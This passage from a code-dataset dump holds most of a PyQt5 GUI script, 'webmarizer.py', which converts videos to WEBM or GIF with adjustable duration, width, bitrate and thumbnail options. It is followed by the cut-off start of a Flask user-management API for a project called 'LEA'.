QtWidgets.QLabel(self.layoutWidget1)\n self.gifModeLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.enableAudioLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.thumbnailModeLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.targetSizeCheckmarkLabel = QtWidgets.QLabel(self.layoutWidget1)\n self.targetFileSizeLabel = QtWidgets.QLabel(self.layoutWidget_2)\n self.bitrateLabel = QtWidgets.QLabel(self.layoutWidget_2)\n self.wadsworthLabel = QtWidgets.QLabel(self.layoutWidget1)\n #===================================================================#\n self.numWEBMSlider = QtWidgets.QSlider(self.layoutWidget)\n self.durationSlider = QtWidgets.QSlider(self.layoutWidget)\n self.sizeSlider = QtWidgets.QSlider(self.layoutWidget)\n self.fileSizeSlider = QtWidgets.QSlider(self.layoutWidget_2)\n self.bitRateSlider = QtWidgets.QSlider(self.layoutWidget_2)\n #===================================================================#\n self.stopBtn = QtWidgets.QPushButton(self.centralwidget)\n self.startSingleBtn = QtWidgets.QPushButton(self.centralwidget)\n self.createBtn = QtWidgets.QPushButton(self.centralwidget)\n #===================================================================#\n self.timeEdit = QtWidgets.QTimeEdit(self.layoutWidget1)\n #===================================================================#\n self.listWidget = QtWidgets.QListWidget(self.generalTab)\n #===================================================================#\n self.thumbnailModeCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.startTimeCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.gifModeCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.audioCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.targetFileSizeCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n self.wadsworthCheckBox = QtWidgets.QCheckBox(self.layoutWidget1)\n #===================================================================#\n self.thumbnailDropdown = QtWidgets.QComboBox(self.layoutWidget1)\n #===================================================================#\n font = QtGui.QFont()\n #===================================================================#\n self.stopBtn.setObjectName(\"stopBtn\")\n self.statusLabel.setObjectName(\"statusLabel\")\n self.thumbnailModeLabel.setObjectName(\"thumbnailModeLabel\")\n 
self.thumbnailModeCheckBox.setObjectName(\"thumbnailModeCheckBox\")\n self.startTimeCheckBox.setObjectName(\"startTimeCheckBox\")\n self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.verticalLayout_6.setObjectName(\"verticalLayout_6\")\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.layoutWidget.setObjectName(\"layoutWidget\")\n self.tabWidget.setObjectName(\"tabWidget\")\n self.generalTab.setObjectName(\"generalTab\")\n self.durationLabel.setObjectName(\"durationLabel\")\n self.durationSlider.setObjectName(\"durationSlider\")\n self.sizeLabel.setObjectName(\"sizeLabel\")\n self.sizeSlider.setObjectName(\"sizeSlider\")\n self.numWEBMLabel.setObjectName(\"numWEBMLabel\")\n self.numWEBMSlider.setObjectName(\"numWEBMSlider\")\n self.videoListTitleLabel.setObjectName(\"videoListTitleLabel\")\n self.advancedTab.setObjectName(\"advancedTab\")\n self.layoutWidget_2.setObjectName(\"layoutWidget_2\")\n self.verticalLayout_5.setObjectName(\"verticalLayout_5\")\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\n self.bitrateLabel.setObjectName(\"bitrateLabel\")\n self.bitRateSlider.setObjectName(\"bitRateSlider\")\n self.targetFileSizeLabel.setObjectName(\"targetFileSizeLabel\")\n self.fileSizeSlider.setObjectName(\"fileSizeSlider\")\n self.layoutWidget1.setObjectName(\"layoutWidget1\")\n self.targetFileSizeCheckBox.setObjectName(\"targetFileSizeCheckBox\")\n self.targetSizeCheckmarkLabel.setObjectName(\"targetSizeCheckmarkLabel\")\n self.audioCheckBox.setObjectName(\"audioCheckBox\")\n self.enableAudioLabel.setObjectName(\"enableAudioLabel\")\n self.gifModeCheckBox.setObjectName(\"gifModeCheckBox\")\n self.gifModeLabel.setObjectName(\"gifModeLabel\")\n self.startTimeLabel.setObjectName(\"startTimeLabel\")\n self.timeEdit.setObjectName(\"timeEdit\")\n self.wadsworthCheckBox.setObjectName(\"wadsworthCheckBox\")\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n self.createBtn.setObjectName(\"createBtn\")\n self.startSingleBtn.setObjectName(\"startSingleBtn\")\n #===================================================================#\n tabStyleString = \"\"\"\n QTabBar::tab {\n width: 300px;\n }\n\n QTabWidget::tab-bar {\n top:30;\n padding-left:0;\n background:transparent;\n width:835px;\n }\n \n QTabWidget::pane {\n border: 0 solid white;\n }\n \"\"\"\n sliderStyleString = \"\"\"\n QSlider::handle:horizontal {\n background: qlineargradient(x1:0, y1:0, x2:1, y2:1, stop:0 #9595ff, stop:1 #1e95ff);\n border: 1px solid #5c5c5c;\n width: 18px;\n margin: -2px 0;\n border-radius: 3px;\n }\n\n QSlider::groove:horizontal {\n border: 1px solid #999999;\n height: 9px; \n background: qlineargradient(x1:0, y1:0, x2:0, y2:1, stop:0 #B1B1B1, stop:1 #c4c4c4);\n margin: 2px 0;\n }\n \"\"\"\n #===================================================================#\n font.setFamily(\"Thonburi\")\n font.setBold(False)\n font.setWeight(50)\n #===================================================================#\n self.tabWidget.setFont(font)\n self.tabWidget.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.tabWidget.setAutoFillBackground(False)\n self.tabWidget.setTabShape(QtWidgets.QTabWidget.Rounded)\n 
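# A minimal sketch (editor's illustration, not in the original record): the
# triple-quoted tabStyleString/sliderStyleString above are Qt Style Sheets, a CSS-like
# syntax with widget and subcontrol selectors (QTabBar::tab, QSlider::handle:horizontal).
# One such string can be previewed on a lone widget in a throwaway app:
#
#     from PyQt5 import QtCore, QtWidgets
#
#     app = QtWidgets.QApplication([])
#     slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
#     slider.setStyleSheet("QSlider::groove:horizontal { height: 9px; background: #c4c4c4; }")
#     slider.show()
#     app.exec_()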
self.tabWidget.setDocumentMode(False)\n self.tabWidget.setGeometry(QtCore.QRect(0, -30, 831, 341))\n self.tabWidget.addTab(self.generalTab, \"\")\n self.tabWidget.addTab(self.advancedTab, \"\")\n self.tabWidget.setStyleSheet(tabStyleString)\n #===================================================================#\n self.generalTab.setAutoFillBackground(False)\n self.generalTab.setStyleSheet(\"\"\"\n QTabBar {\n qproperty-drawBase: 0;\n }\n \"\"\")\n #===================================================================#\n self.layoutWidget.setGeometry(QtCore.QRect(20, 40, 381, 211))\n #===================================================================#\n sizePolicy.setHeightForWidth(self.wadsworthCheckBox.sizePolicy().hasHeightForWidth())\n self.wadsworthCheckBox.setSizePolicy(sizePolicy)\n self.wadsworthCheckBox.setText(\"\")\n #===================================================================#\n self.wadsworthLabel.setEnabled(True)\n self.wadsworthLabel.setFont(font)\n self.wadsworthLabel.setTextFormat(QtCore.Qt.RichText)\n self.wadsworthLabel.setObjectName(\"wadsworthLabel\")\n #===================================================================#\n self.durationLabel.setEnabled(True)\n self.durationLabel.setFont(font)\n self.durationLabel.setStyleSheet(\"\")\n self.durationLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.durationSlider.setMinimum(1)\n self.durationSlider.setMaximum(30)\n self.durationSlider.setOrientation(QtCore.Qt.Horizontal)\n self.durationSlider.setStyleSheet(sliderStyleString)\n #===================================================================#\n self.sizeLabel.setEnabled(True)\n self.sizeLabel.setFont(font)\n self.sizeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.sizeSlider.setMinimum(300)\n self.sizeSlider.setMaximum(3000)\n self.sizeSlider.setOrientation(QtCore.Qt.Horizontal)\n self.sizeSlider.setStyleSheet(sliderStyleString)\n #===================================================================#\n self.numWEBMLabel.setEnabled(True)\n self.numWEBMLabel.setFont(font)\n self.numWEBMLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.numWEBMSlider.setMinimum(1)\n self.numWEBMSlider.setMaximum(50)\n self.numWEBMSlider.setOrientation(QtCore.Qt.Horizontal)\n self.numWEBMSlider.setStyleSheet(sliderStyleString) \n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.listWidget.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.listWidget.setGeometry(QtCore.QRect(430, 70, 381, 171))\n self.listWidget.setSizePolicy(sizePolicy)\n self.listWidget.setFont(font)\n self.listWidget.setWordWrap(True)\n self.listWidget.setObjectName(\"listWidget\")\n self.listWidget.setStyleSheet(\"\"\"\n background-color:#fff;\n border:1px solid black;\n \"\"\")\n #===================================================================#\n self.videoListTitleLabel.setGeometry(QtCore.QRect(580, 40, 81, 21))\n self.videoListTitleLabel.setFont(font)\n #===================================================================#\n self.layoutWidget_2.setGeometry(QtCore.QRect(420, 40, 371, 102))\n #===================================================================#\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n 
self.verticalLayout.addWidget(self.durationLabel)\n self.verticalLayout.addWidget(self.durationSlider)\n self.verticalLayout.addItem(spacerItem)\n self.verticalLayout.addWidget(self.numWEBMLabel)\n self.verticalLayout.addWidget(self.numWEBMSlider)\n self.verticalLayout.addItem(spacerItem1)\n self.verticalLayout.addWidget(self.sizeLabel)\n self.verticalLayout.addWidget(self.sizeSlider)\n #===================================================================#\n self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout_2.addLayout(self.verticalLayout_4)\n #===================================================================#\n self.verticalLayout_3.addLayout(self.horizontalLayout_7)\n self.verticalLayout_3.addLayout(self.horizontalLayout_8)\n #===================================================================#\n self.verticalLayout_4.addLayout(self.verticalLayout_6)\n self.verticalLayout_4.addWidget(self.targetFileSizeLabel)\n self.verticalLayout_4.addWidget(self.fileSizeSlider)\n #===================================================================#\n self.verticalLayout_5.addLayout(self.verticalLayout_3)\n self.verticalLayout_5.addLayout(self.horizontalLayout)\n self.verticalLayout_5.addLayout(self.horizontalLayout_2)\n self.verticalLayout_5.addLayout(self.horizontalLayout_4)\n self.verticalLayout_5.addLayout(self.horizontalLayout_3)\n self.verticalLayout_5.setContentsMargins(0, 0, 0, 0)\n #===================================================================#\n self.verticalLayout_6.addWidget(self.bitRateSlider)\n self.verticalLayout_6.addWidget(self.bitrateLabel)\n #===================================================================#\n self.horizontalLayout.addWidget(self.gifModeCheckBox)\n self.horizontalLayout.addWidget(self.gifModeLabel)\n #===================================================================#\n self.horizontalLayout_2.addWidget(self.startTimeCheckBox)\n self.horizontalLayout_2.addWidget(self.startTimeLabel)\n self.horizontalLayout_2.addWidget(self.timeEdit)\n self.horizontalLayout_2.addItem(spacerItem2)\n #===================================================================#\n self.horizontalLayout_3.addWidget(self.thumbnailModeCheckBox)\n self.horizontalLayout_3.addWidget(self.thumbnailModeLabel)\n self.horizontalLayout_3.addWidget(self.thumbnailDropdown)\n #===================================================================#\n self.horizontalLayout_4.addWidget(self.wadsworthCheckBox)\n self.horizontalLayout_4.addWidget(self.wadsworthLabel)\n #===================================================================#\n self.thumbnailDropdown.setIconSize(QtCore.QSize(16, 16))\n self.thumbnailDropdown.setObjectName(\"thumbnailDropdown\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.addItem(\"\")\n self.thumbnailDropdown.setStyleSheet('''\n QComboBox {\n border-style: solid;\n selection-color:black;\n background-color:#f9f9f9;\n border:1px solid black;\n border-radius: 5;\n padding: 1px 0px 1px 10px;\n }\n\n QComboBox::down-arrow {\n width: 14px;\n color:white;\n }\n ''')\n #===================================================================#\n self.horizontalLayout_7.addWidget(self.targetFileSizeCheckBox)\n self.horizontalLayout_7.addWidget(self.targetSizeCheckmarkLabel)\n #===================================================================#\n self.horizontalLayout_8.addWidget(self.audioCheckBox)\n 
self.horizontalLayout_8.addWidget(self.enableAudioLabel)\n #===================================================================#\n self.bitrateLabel.setEnabled(True)\n self.bitrateLabel.setFont(font)\n self.bitrateLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.bitRateSlider.setStyleSheet(sliderStyleString)\n self.bitRateSlider.setMinimum(1000)\n self.bitRateSlider.setMaximum(15000)\n self.bitRateSlider.setOrientation(QtCore.Qt.Horizontal)\n #===================================================================#\n self.targetFileSizeLabel.setEnabled(True)\n self.targetFileSizeLabel.setFont(font)\n self.targetFileSizeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.fileSizeSlider.setStyleSheet(sliderStyleString)\n self.fileSizeSlider.setMinimum(100)\n self.fileSizeSlider.setMaximum(15000)\n self.fileSizeSlider.setOrientation(QtCore.Qt.Horizontal)\n #===================================================================#\n self.layoutWidget1.setGeometry(QtCore.QRect(10, 40, 401, 221))\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.targetFileSizeCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.targetFileSizeCheckBox.setSizePolicy(sizePolicy)\n self.targetFileSizeCheckBox.setText(\"\")\n #===================================================================#\n self.targetSizeCheckmarkLabel.setEnabled(True)\n self.targetSizeCheckmarkLabel.setFont(font)\n self.targetSizeCheckmarkLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.audioCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.audioCheckBox.setSizePolicy(sizePolicy)\n self.audioCheckBox.setText(\"\")\n #===================================================================#\n self.enableAudioLabel.setEnabled(True)\n self.enableAudioLabel.setFont(font)\n self.enableAudioLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.gifModeCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.gifModeCheckBox.setSizePolicy(sizePolicy)\n self.gifModeCheckBox.setText(\"\")\n #===================================================================#\n self.gifModeLabel.setEnabled(True)\n self.gifModeLabel.setFont(font)\n self.gifModeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.startTimeCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.startTimeCheckBox.setSizePolicy(sizePolicy)\n self.startTimeCheckBox.setText(\"\")\n #===================================================================#\n self.startTimeLabel.setEnabled(True)\n self.startTimeLabel.setFont(font)\n self.startTimeLabel.setTextFormat(QtCore.Qt.RichText)\n 
#===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.timeEdit.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.timeEdit.setSizePolicy(sizePolicy)\n self.timeEdit.setFont(font)\n self.timeEdit.setInputMethodHints(QtCore.Qt.ImhNone)\n self.timeEdit.setDateTime(QtCore.QDateTime(QtCore.QDate(2000, 1, 1), QtCore.QTime(0, 0, 0)))\n self.timeEdit.setCurrentSection(QtWidgets.QDateTimeEdit.HourSection)\n self.timeEdit.setCalendarPopup(False)\n self.timeEdit.setTimeSpec(QtCore.Qt.LocalTime)\n #===================================================================#\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.thumbnailModeCheckBox.sizePolicy().hasHeightForWidth())\n #===================================================================#\n self.thumbnailModeCheckBox.setSizePolicy(sizePolicy)\n self.thumbnailModeCheckBox.setText(\"\")\n #===================================================================#\n self.thumbnailModeLabel.setEnabled(True)\n self.thumbnailModeLabel.setFont(font)\n self.thumbnailModeLabel.setTextFormat(QtCore.Qt.RichText)\n #===================================================================#\n self.statusLabel.setGeometry(QtCore.QRect(430, 270, 351, 31))\n self.statusLabel.setText(\"\")\n self.statusLabel.setWordWrap(True)\n #===================================================================#\n self.createBtn.setGeometry(QtCore.QRect(10, 260, 123, 61))\n self.createBtn.setFont(font)\n #===================================================================#\n self.startSingleBtn.setGeometry(QtCore.QRect(140, 260, 131, 61))\n self.startSingleBtn.setFont(font)\n #===================================================================#\n self.stopBtn.setGeometry(QtCore.QRect(280, 260, 131, 61))\n self.stopBtn.setFont(font)\n #===================================================================#\n MainWindow.setCentralWidget(self.centralwidget)\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n self.listWidget.itemSelectionChanged.connect(self.setSelected)\n self.listWidget.setAttribute(QtCore.Qt.WA_MacShowFocusRect, 0)\n self.durationSlider.valueChanged.connect(self.editDurationLabel)\n self.sizeSlider.valueChanged.connect(self.editSizeLabel)\n self.numWEBMSlider.valueChanged.connect(self.editNumWEBMLabel)\n self.createBtn.clicked.connect(self.createMedia)\n self.startSingleBtn.clicked.connect(self.createSelectedMedia)\n self.bitRateSlider.valueChanged.connect(self.editBitrateLabel)\n self.audioCheckBox.stateChanged.connect(self.editAudioCheckBox)\n self.gifModeCheckBox.stateChanged.connect(self.enableGifMode)\n self.targetFileSizeCheckBox.stateChanged.connect(self.editTargetFileSizeCheckBox)\n self.fileSizeSlider.valueChanged.connect(self.editTargetFileSizeSliderLabel)\n self.startTimeCheckBox.stateChanged.connect(self.singleMode)\n self.thumbnailModeCheckBox.stateChanged.connect(self.thumbnailMode)\n self.wadsworthCheckBox.stateChanged.connect(self.enableWadsworth)\n self.timeEdit.timeChanged.connect(self.singleMode)\n self.stopBtn.clicked.connect(self.stopProcess)\n self.thumbnailDropdown.currentIndexChanged.connect(self.editThumbnailMode)\n \n self.durationSlider.setSliderPosition(10)\n self.sizeSlider.setSliderPosition(500)\n self.numWEBMSlider.setSliderPosition(5)\n 
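# A minimal sketch (editor's illustration, not in the original record) of the Qt
# signal/slot pattern used in the .connect() block above: every valueChanged emitted
# by a slider calls the bound handler, which is how the duration/width/bitrate labels
# track their sliders live.
#
#     from PyQt5 import QtCore, QtWidgets
#
#     app = QtWidgets.QApplication([])
#     box = QtWidgets.QWidget()
#     layout = QtWidgets.QVBoxLayout(box)
#     label = QtWidgets.QLabel("WEBM Duration: 1 seconds")
#     slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
#     slider.setMinimum(1)
#     slider.setMaximum(30)
#     slider.valueChanged.connect(lambda v: label.setText("WEBM Duration: %d seconds" % v))
#     layout.addWidget(label)
#     layout.addWidget(slider)
#     box.show()
#     app.exec_()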
self.bitRateSlider.setSliderPosition(1500)\n        self.fileSizeSlider.setSliderPosition(4000)\n        self.wadsworthCheckBox.setChecked(True)\n        self.populateListLabel()\n        self.editDurationLabel()\n        self.editSizeLabel()\n        self.editNumWEBMLabel()\n        self.editBitrateLabel()\n        self.editTargetFileSizeSliderLabel()\n        \n\n    def retranslateUi(self, MainWindow):\n        _translate = QtCore.QCoreApplication.translate\n        MainWindow.setWindowTitle(_translate(\"MainWindow\", \"WEBMARIZER\"))\n        self.durationLabel.setText(_translate(\"MainWindow\", \"WEBM Duration:\"))\n        self.sizeLabel.setText(_translate(\"MainWindow\", \"WEBM Width:\"))\n        self.numWEBMLabel.setText(_translate(\"MainWindow\", \"Number of WEBMs:\"))\n        \n        self.tabWidget.setTabText(self.tabWidget.indexOf(self.generalTab), _translate(\"MainWindow\", \"General Options\"))\n        self.bitrateLabel.setText(_translate(\"MainWindow\", \"Bitrate:\"))\n        self.targetFileSizeLabel.setText(_translate(\"MainWindow\", \"Target File Size (MB):\"))\n        self.targetSizeCheckmarkLabel.setText(_translate(\"MainWindow\", \"Enable Target File Size\"))\n        \n        self.timeEdit.setDisplayFormat(_translate(\"MainWindow\", \"hh:mm:ss\"))\n        self.tabWidget.setTabText(self.tabWidget.indexOf(self.advancedTab), _translate(\"MainWindow\", \"Advanced Options\"))\n        self.createBtn.setText(_translate(\"MainWindow\", \"Create WEBM\\n\"\n\"(All videos)\"))\n        self.startSingleBtn.setText(_translate(\"MainWindow\", \"Create WEBM \\n\"\n\"(Selected videos)\"))\n        self.stopBtn.setText(_translate(\"MainWindow\", \"Stop Process\"))\n        self.thumbnailDropdown.setItemText(0, _translate(\"MainWindow\", \"2x2\"))\n        self.thumbnailDropdown.setItemText(1, _translate(\"MainWindow\", \"3x3\"))\n        self.thumbnailDropdown.setItemText(2, _translate(\"MainWindow\", \"4x4\"))\n        self.thumbnailDropdown.setItemText(3, _translate(\"MainWindow\", \"5x5\"))\n        self.thumbnailDropdown.setItemText(4, _translate(\"MainWindow\", \"6x6\"))\n        if (platform.system() == 'Windows'): # macOS and Windows render label fonts at different sizes, so the label text is set per platform\n            self.enableAudioLabel.setText(_translate(\"MainWindow\", \"Enable Audio\"))\n            self.targetSizeCheckmarkLabel.setText(_translate(\"MainWindow\", \"Enable Target File Size\"))\n            self.gifModeLabel.setText(_translate(\"MainWindow\", \"Enable GIF Mode\"))\n            self.thumbnailModeLabel.setText(_translate(\"MainWindow\", \"Enable Thumbnail Mode\"))\n            self.wadsworthLabel.setText(_translate(\"MainWindow\", \"Enable Wadsworth Constant (Skip first ~30%)\"))\n            self.videoListTitleLabel.setText(_translate(\"MainWindow\", \"Videos\"))\n            self.startTimeLabel.setText(_translate(\"MainWindow\", \"Single GIF/WEBM starting at time:\"))\n        else:\n            self.enableAudioLabel.setText(_translate(\"MainWindow\", \"Enable Audio\"))\n            self.targetSizeCheckmarkLabel.setText(_translate(\"MainWindow\", \"Enable Target File Size\"))\n            self.gifModeLabel.setText(_translate(\"MainWindow\", \"Enable GIF Mode\"))\n            self.thumbnailModeLabel.setText(_translate(\"MainWindow\", \"Enable Thumbnail Mode\"))\n            self.wadsworthLabel.setText(_translate(\"MainWindow\", \"Enable Wadsworth Constant (Skip first ~30%)\"))\n            self.videoListTitleLabel.setText(_translate(\"MainWindow\", \"Videos\"))\n            self.startTimeLabel.setText(_translate(\"MainWindow\", \"Single GIF/WEBM starting at time:
\"))\n \n # Determine the video currently selected in the video list\n def setSelected(self):\n global selectedVideo\n selectedVideo = self.listWidget.selectedItems()[0].text()\n \n\n # Attempts to kill WEBM creation process\n def stopProcess(self):\n global FFmpegProcess, stopped\n FFmpegProcess.kill()\n stopped = True\n\n def editThumbnailMode(self):\n global thumbnailNumTilesSide\n if (self.thumbnailDropdown.currentText() == '2x2'):\n thumbnailNumTilesSide = 2\n elif (self.thumbnailDropdown.currentText() == '3x3'):\n thumbnailNumTilesSide = 3\n elif (self.thumbnailDropdown.currentText() == '4x4'):\n thumbnailNumTilesSide = 4\n elif (self.thumbnailDropdown.currentText() == '5x5'):\n thumbnailNumTilesSide = 5\n elif (self.thumbnailDropdown.currentText() == '6x6'):\n thumbnailNumTilesSide = 6\n\n def enableGifMode(self):\n global output_type\n if (self.gifModeCheckBox.isChecked()):\n output_type = 'GIF'\n self.durationLabel.setText(\"GIF Duration: \" + str(self.durationSlider.value()) + \" seconds\")\n self.sizeLabel.setText(\"GIF Width: \" + str(self.sizeSlider.value()) + \" px\")\n self.numWEBMLabel.setText(\"Number of GIFs: \" + str(self.numWEBMSlider.value()))\n else:\n output_type = 'WEBM'\n self.editDurationLabel()\n self.editSizeLabel()\n self.editNumWEBMLabel()\n print(\"Current Mode: \" + output_type)\n\n def enableWadsworth(self):\n global wadsworthConstant\n if (self.wadsworthCheckBox.isChecked()):\n wadsworthConstant = 30\n print(\"Wadsworth constant is enabled. Skipping first 30% of video.\")\n else:\n wadsworthConstant = 0\n print(\"Wadsworth constant is disabled. Starting from beginning of video.\")\n\n\n # If the user specifies a specific start time for GIF/WEBM\n def singleMode(self):\n global single_mode, time_array\n if (self.startTimeCheckBox.isChecked()):\n single_mode = True\n time_array[0] = self.timeEdit.time().hour()\n time_array[1] = self.timeEdit.time().minute()\n time_array[2] = self.timeEdit.time().second()\n self.numWEBMSlider.setEnabled(False)\n self.numWEBMSlider.setSliderPosition(1)\n self.numWEBMLabel.setText(\"Disabled (Single GIF/WEBM mode enabled)\")\n print(\"Selected Time: \" + str(time_array))\n else:\n single_mode = False\n self.numWEBMSlider.setEnabled(True)\n self.enableGifMode() # Return the label back to proper value\n\n def thumbnailMode(self):\n global thumbnailMode\n if (self.thumbnailModeCheckBox.isChecked()):\n thumbnailMode = True\n else:\n thumbnailMode = False\n\n # Sets label to user selected WEBM duration from slider value\n def editDurationLabel(self):\n self.durationLabel.setText(\"WEBM Duration: \" + str(self.durationSlider.value()) + \" seconds\")\n self.editoutputDuration()\n\n # Sets webm duration to corresponding slider value\n def editoutputDuration(self):\n global outputDuration\n outputDuration = self.durationSlider.value()\n if targetSizeSet:\n self.editFileSize()\n\n # Set the bitrate label value\n def editBitrateLabel(self):\n if targetSizeSet:\n self.bitrateLabel.setText(\"Bitrate: \" + str(self.bitRateSlider.value()) + \" kbits/s (Slider disabled)\")\n else:\n self.bitrateLabel.setText(\"Bitrate: \" + str(self.bitRateSlider.value()) + \" kbits/s\")\n self.editBitrate()\n \n # Changes bitrate to corresponding slider value\n def editBitrate(self):\n global bitrate\n bitrate = self.bitRateSlider.value()\n\n # Changes boolean for audio enabled\n def editAudioCheckBox(self):\n global audioEnabled\n audioEnabled = self.audioCheckBox.isChecked()\n\n # Changes value of target file size \n def editTargetFileSizeCheckBox(self):\n 
global targetSizeSet\n targetSizeSet = self.targetFileSizeCheckBox.isChecked()\n self.editTargetFileSizeSliderLabel()\n self.editBitrateLabel()\n\n # Set the target file size label\n def editTargetFileSizeSliderLabel(self): \n if targetSizeSet:\n self.targetFileSizeLabel.setText(\"Target File Size: \" + str(self.fileSizeSlider.value()/1000) + \" MB\")\n self.editFileSize()\n self.bitRateSlider.setEnabled(False)\n self.fileSizeSlider.setEnabled(True)\n else:\n self.fileSizeSlider.setEnabled(False)\n self.bitRateSlider.setEnabled(True)\n self.targetFileSizeLabel.setText(\"Target File Size: Disabled\")\n\n # Change value of file size to corresponding slider value\n def editFileSize(self):\n global fileSize\n fileSize = self.fileSizeSlider.value()\n video_bitrate = ( ( fileSize * 8 * 1000 ) / outputDuration ) - 96000 #96 kbps audio bitrate\n self.bitRateSlider.setSliderPosition(video_bitrate / 1000)\n\n # Set the WEBM width label text to slider value\n def editSizeLabel(self):\n self.sizeLabel.setText(\"WEBM Width: \" + str(self.sizeSlider.value()) + \" px\")\n self.editSize() \n\n # Set WEBM width variable to corresponding slider value\n def editSize(self):\n global outputWidth\n outputWidth = self.sizeSlider.value()\n\n # Sets WEBM number label text to slider value\n def editNumWEBMLabel(self):\n self.numWEBMLabel.setText(\"Number of WEBMs: \" + str(self.numWEBMSlider.value()))\n self.editNumWEBM()\n\n # Sets number of WEBMs variable to corresponding slider value\n def editNumWEBM(self):\n global numWEBM\n numWEBM = self.numWEBMSlider.value()\n\n # Sets the status label text to current WEBM we're creating\n def setStatusText(self, status):\n #self.statusLabel.setText(status)\n self.statusLabel.setText(status)\n\n # If there's videos in current folder, we show them in the list widget\n def populateListLabel(self):\n videos_array = createVideoList()\n if (len(videos_array) > 0):\n for video in videos_array:\n item = QtWidgets.QListWidgetItem()\n item.setText(video)\n self.listWidget.addItem(item)\n else:\n item = QtWidgets.QListWidgetItem()\n item.setFlags(QtCore.Qt.ItemIsSelectable)\n self.listWidget.addItem(\"No videos found\")\n\n # Starts creating WEBMs from all videos in list\n def createMedia(self):\n init()\n\n # Starts creating WEBMs only from selected video in list\n def createSelectedMedia(self):\n processVideo(selectedVideo)\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n GUI = Ui_MainWindow()\n GUI.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n\n","sub_path":"webmarizer.py","file_name":"webmarizer.py","file_ext":"py","file_size_in_byte":50093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"542269557","text":"from LEA import app, resources, users, apiresponse, actions, packages, process\nfrom simplepam import authenticate\nfrom flask import render_template, session, redirect, url_for, escape, request\nfrom jinja2 import TemplateNotFound\nimport json\n\n\nINTERNAL_ERROR = \"500: Internal server error\"\n\napp.config.from_json('settings.json')\n\n\n@app.route('/api/create_user', methods=['POST'])\ndef api_create_user():\n content = request.json\n print(content)\n response = apiresponse.APIResponse()\n if users.create_user(content['username'], content['auth']):\n response.insert_value(\"Status\", \"OK\")\n response.insert_value(\"Message\", \"User \" + content['username'] + \" created\")\n else:\n response.insert_value(\"Error\", \"Couldn't 
create user\")\n return response.get_json()\n\n\n@app.route(\"/api/delete_user\", methods=[\"POST\"])\ndef api_delete_user():\n content = request.json\n response = apiresponse.APIResponse()\n if users.delete_user(str(content['username']['s']['s'])): # Will return 1 if user hasn't been created\n response.insert_value(\"Status\", \"OK\")\n else:\n response.insert_value(\"Error\", \"Couldn't delete user\")\n return response.get_json()\n\n\n@app.route(\"/api/change_password\", methods=[\"POST\"])\ndef api_change_password():\n content = request.json\n user = content['username']\n new_pass = content['new_password']\n old_pass = content['old_pass']\n # TODO: Implement function in users.py\n response = apiresponse.APIResponse()\n response.insert_value(\"Status\", \"OK\")\n return response.get_json()\n\n\n@app.route('/api/login', methods=['POST'])\ndef login():\n content = request.json\n ip = content['ip']\n password = content['password']\n\n response = apiresponse.APIResponse()\n response.insert_value(\"IP\", str(ip))\n return 